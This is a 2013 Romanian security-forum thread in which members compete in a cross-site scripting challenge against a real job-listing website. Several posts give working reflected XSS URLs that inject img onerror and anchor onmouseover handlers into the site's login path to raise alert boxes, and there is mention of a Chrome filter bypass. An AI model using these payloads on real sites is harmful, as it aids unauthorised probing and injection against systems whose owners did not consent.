florin_darck Posted May 31, 2013 Report Posted May 31, 2013 (edited) Target : Click me !Level : medium.. maybe hardCerinte - postati o imagine cenzurata - nu dati hint-uriNu trebuie sa fiti logati. Cei care il rezolvati cu account nu se acceptaPS: Daca nu va descurcati va mai dau un hint pe parcurs.Proof SolversSimple1.danyweb09 [pm cu rezolvarea corecta]2.SilenTx03.Renegade4.23. 5.daNNy.bv Chrome1.danyweb092.SilenTx03.VaD_SuNeTeChallenge Closed Edited June 4, 2013 by florin_darck Quote
Active Members dancezar Posted May 31, 2013 Active Members Report Posted May 31, 2013 (edited) View image: xss florin//Edit cel care trebuia:http://postimg.org/image/fgt0b5c9t/full///Si bypass pentru chrome:http://s23.postimg.org/sqkqsa1ft/xss_bypass.png Edited May 31, 2013 by danyweb09 Quote
florin_darck Posted May 31, 2013 Author Report Posted May 31, 2013 Din pacate nu se accepta. In poza se vede. Nu suntem logati cand "sare" alertul Quote
florin_darck Posted May 31, 2013 Author Report Posted May 31, 2013 Bine baieti. Cine il face sa mearga pe chrome in trec intr-un top separat Quote
daNNy.bv Posted June 3, 2013 Report Posted June 3, 2013 ceva mai inedit http://www.careerjunction.co.za/my/account/login%22%3E%3Cimg%20src=x%20onerror=prompt%28%22daNNy.bv%22%29;%3E use firefox Quote
Renegade Posted June 3, 2013 Report Posted June 3, 2013 (edited) ceva mai inedit http://www.careerjunction.co.za/my/account/login%22%3E%3Cimg%20src=x%20onerror=prompt%28%22daNNy.bv%22%29;%3E use firefoxlol... asa il rezolvasem si eu prima data:http://www.careerjunction.co.za/my/account/login"><a href=x onmouseover=confirm("Renegade")>XSS</a> Mozillasi chiar l-am intrebat atunci pe florin_darck (flori_darck nu era sigur),si pe akkiliON acuma prin PM daca nu e path disclosure Edited June 4, 2013 by Renegade Quote
yo20063 Posted June 14, 2013 Report Posted June 14, 2013 http://www.careerjunction.co.za/my/account/login%3Ca%20href=y%20onmouseover=alert%28%27yo20063%27%29%3E%3Cfont%20color=%22red%22%3E%3Cblink%3E%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Ch1%20align=%22center%22%3E.%22%3EXSS%3C/blink%3E%3C/font%3E%3C/a%3E Quote